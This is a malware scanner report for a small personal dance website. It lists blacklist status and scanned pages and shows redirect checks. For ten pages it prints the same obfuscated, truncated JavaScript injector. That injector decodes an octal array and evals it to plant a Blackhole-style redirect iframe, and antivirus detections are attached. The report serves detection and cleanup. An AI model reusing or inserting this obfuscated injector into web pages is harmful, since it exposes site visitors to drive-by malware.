Malware Scanner report for dancemonkeyonline.com

Malicious/Suspicious/Total urls checked: 9/1/15

10 pages have malicious or suspicious code. See details below

Blacklists: Found

The website is marked by Yandex as suspicious.

The website "dancemonkeyonline.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/10

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=dancemonkeyonline.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://dancemonkeyonline.com/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://dancemonkeyonline.com/	200 OK Content-Length: 13700 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){++d.body};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,155,166,171,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,155,166,171,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,160,151,172,152,150,164,167,65,155,171,66,111,170,76,115,151,157,201,71,65,167,157,167,56,102,24,21,47,155,166,171,65,1 ... 4064 bytes are skipped ...,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],8);}try{asd()}catch(q){yy=50-50;}try{yy/=2}catch(q){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a)); Antivirus reports: AntiVir JS/BlacoleRef.EB.3 McAfee-GW-Edition JS/Blacole-Redirect.ae TrendMicro HEUR_HTJS.HDJSFN Fortinet JS/Redurectir.BOZ!tr McAfee JS/Blacole-Redirect.ae GData Script.Obfuscated.IFrame.C
http://dancemonkeyonline.com/index.html	200 OK Content-Length: 13700 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){++d.body};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,155,166,171,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,155,166,171,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,160,151,172,152,150,164,167,65,155,171,66,111,170,76,115,151,157,201,71,65,167,157,167,56,102,24,21,47,155,166,171,65,1 ... 4064 bytes are skipped ...,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],8);}try{asd()}catch(q){yy=50-50;}try{yy/=2}catch(q){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a)); Antivirus reports: AntiVir JS/BlacoleRef.EB.3 McAfee-GW-Edition JS/Blacole-Redirect.ae TrendMicro HEUR_HTJS.HDJSFN Fortinet JS/Redurectir.BOZ!tr McAfee JS/Blacole-Redirect.ae GData Script.Obfuscated.IFrame.C
http://dancemonkeyonline.com/dance.html	200 OK Content-Length: 61820 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){++d.body};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,155,166,171,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,155,166,171,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,160,151,172,152,150,164,167,65,155,171,66,111,170,76,115,151,157,201,71,65,167,157,167,56,102,24,21,47,155,166,171,65,1 ... 4064 bytes are skipped ...,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],8);}try{asd()}catch(q){yy=50-50;}try{yy/=2}catch(q){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a)); Antivirus reports: AntiVir JS/BlacoleRef.EB.3 McAfee-GW-Edition JS/Blacole-Redirect.ae TrendMicro HEUR_HTJS.HDJSFN Fortinet JS/Redurectir.BOZ!tr McAfee JS/Blacole-Redirect.ae GData Script.Obfuscated.IFrame.C
http://dancemonkeyonline.com/writing.htm	200 OK Content-Length: 47559 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){++d.body};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,155,166,171,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,155,166,171,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,160,151,172,152,150,164,167,65,155,171,66,111,170,76,115,151,157,201,71,65,167,157,167,56,102,24,21,47,155,166,171,65,1 ... 4064 bytes are skipped ...,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],8);}try{asd()}catch(q){yy=50-50;}try{yy/=2}catch(q){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a)); Antivirus reports: AntiVir JS/BlacoleRef.EB.3 McAfee-GW-Edition JS/Blacole-Redirect.ae TrendMicro HEUR_HTJS.HDJSFN Fortinet JS/Redurectir.BOZ!tr McAfee JS/Blacole-Redirect.ae GData Script.Obfuscated.IFrame.C
http://dancemonkeyonline.com/photography.htm	200 OK Content-Length: 25746 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){++d.body};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,155,166,171,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,155,166,171,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,160,151,172,152,150,164,167,65,155,171,66,111,170,76,115,151,157,201,71,65,167,157,167,56,102,24,21,47,155,166,171,65,1 ... 4064 bytes are skipped ...,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],8);}try{asd()}catch(q){yy=50-50;}try{yy/=2}catch(q){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a)); Antivirus reports: AntiVir JS/BlacoleRef.EB.3 McAfee-GW-Edition JS/Blacole-Redirect.ae TrendMicro HEUR_HTJS.HDJSFN Fortinet JS/Redurectir.BOZ!tr McAfee JS/Blacole-Redirect.ae GData Script.Obfuscated.IFrame.C
http://dancemonkeyonline.com/music.htm	200 OK Content-Length: 18210 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){++d.body};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,155,166,171,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,155,166,171,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,160,151,172,152,150,164,167,65,155,171,66,111,170,76,115,151,157,201,71,65,167,157,167,56,102,24,21,47,155,166,171,65,1 ... 4064 bytes are skipped ...,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],8);}try{asd()}catch(q){yy=50-50;}try{yy/=2}catch(q){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a)); Antivirus reports: AntiVir JS/BlacoleRef.EB.3 McAfee-GW-Edition JS/Blacole-Redirect.ae TrendMicro HEUR_HTJS.HDJSFN Fortinet JS/Redurectir.BOZ!tr McAfee JS/Blacole-Redirect.ae GData Script.Obfuscated.IFrame.C
http://dancemonkeyonline.com/rainbow.htm	200 OK Content-Length: 46476 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){++d.body};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,155,166,171,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,155,166,171,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,160,151,172,152,150,164,167,65,155,171,66,111,170,76,115,151,157,201,71,65,167,157,167,56,102,24,21,47,155,166,171,65,1 ... 4064 bytes are skipped ...,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],8);}try{asd()}catch(q){yy=50-50;}try{yy/=2}catch(q){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a)); Antivirus reports: AntiVir JS/BlacoleRef.EB.3 McAfee-GW-Edition JS/Blacole-Redirect.ae TrendMicro HEUR_HTJS.HDJSFN Fortinet JS/Redurectir.BOZ!tr McAfee JS/Blacole-Redirect.ae GData Script.Obfuscated.IFrame.C
http://dancemonkeyonline.com/zumba.html	200 OK Content-Length: 18985 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){++d.body};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,155,166,171,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,155,166,171,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,160,151,172,152,150,164,167,65,155,171,66,111,170,76,115,151,157,201,71,65,167,157,167,56,102,24,21,47,155,166,171,65,1 ... 4064 bytes are skipped ...,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],8);}try{asd()}catch(q){yy=50-50;}try{yy/=2}catch(q){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a)); Antivirus reports: AntiVir JS/BlacoleRef.EB.3 McAfee-GW-Edition JS/Blacole-Redirect.ae TrendMicro HEUR_HTJS.HDJSFN Fortinet JS/Redurectir.BOZ!tr McAfee JS/Blacole-Redirect.ae GData Script.Obfuscated.IFrame.C
http://dancemonkeyonline.com/video.html	200 OK Content-Length: 64352 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" language="javascript" > You are blocked by day limit</script>
http://dancemonkeyonline.com/test404page.js	404 Not Found Content-Length: 3671 Content-Type: text/html	clean
http://dancemonkeyonline.com/me.html	200 OK Content-Length: 35770 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){++d.body};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,155,166,171,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,155,166,171,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,160,151,172,152,150,164,167,65,155,171,66,111,170,76,115,151,157,201,71,65,167,157,167,56,102,24,21,47,155,166,171,65,1 ... 4064 bytes are skipped ...,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],8);}try{asd()}catch(q){yy=50-50;}try{yy/=2}catch(q){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a)); Antivirus reports: AntiVir JS/BlacoleRef.EB.3 McAfee-GW-Edition JS/Blacole-Redirect.ae TrendMicro HEUR_HTJS.HDJSFN Fortinet JS/Redurectir.BOZ!tr McAfee JS/Blacole-Redirect.ae GData Script.Obfuscated.IFrame.C
http://dancemonkeyonline.com/video.htm	404 Not Found Content-Length: 3671 Content-Type: text/html	clean
http://dancemonkeyonline.com/me.htm	404 Not Found Content-Length: 3671 Content-Type: text/html	clean
http://dancemonkeyonline.com/progress%20jpg.jpg	200 OK Content-Length: 214403 Content-Type: image/jpeg	clean
http://dancemonkeyonline.com/dancing%20jpg.jpg	200 OK Content-Length: 152514 Content-Type: image/jpeg	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: dancemonkeyonline.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 15 May 2014 20:39:11 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.2.14

Second query (visit from search engine):
GET / HTTP/1.1
Host: dancemonkeyonline.com
Referer: http://www.google.com/search?q=dancemonkeyonline.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for dancemonkeyonline.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools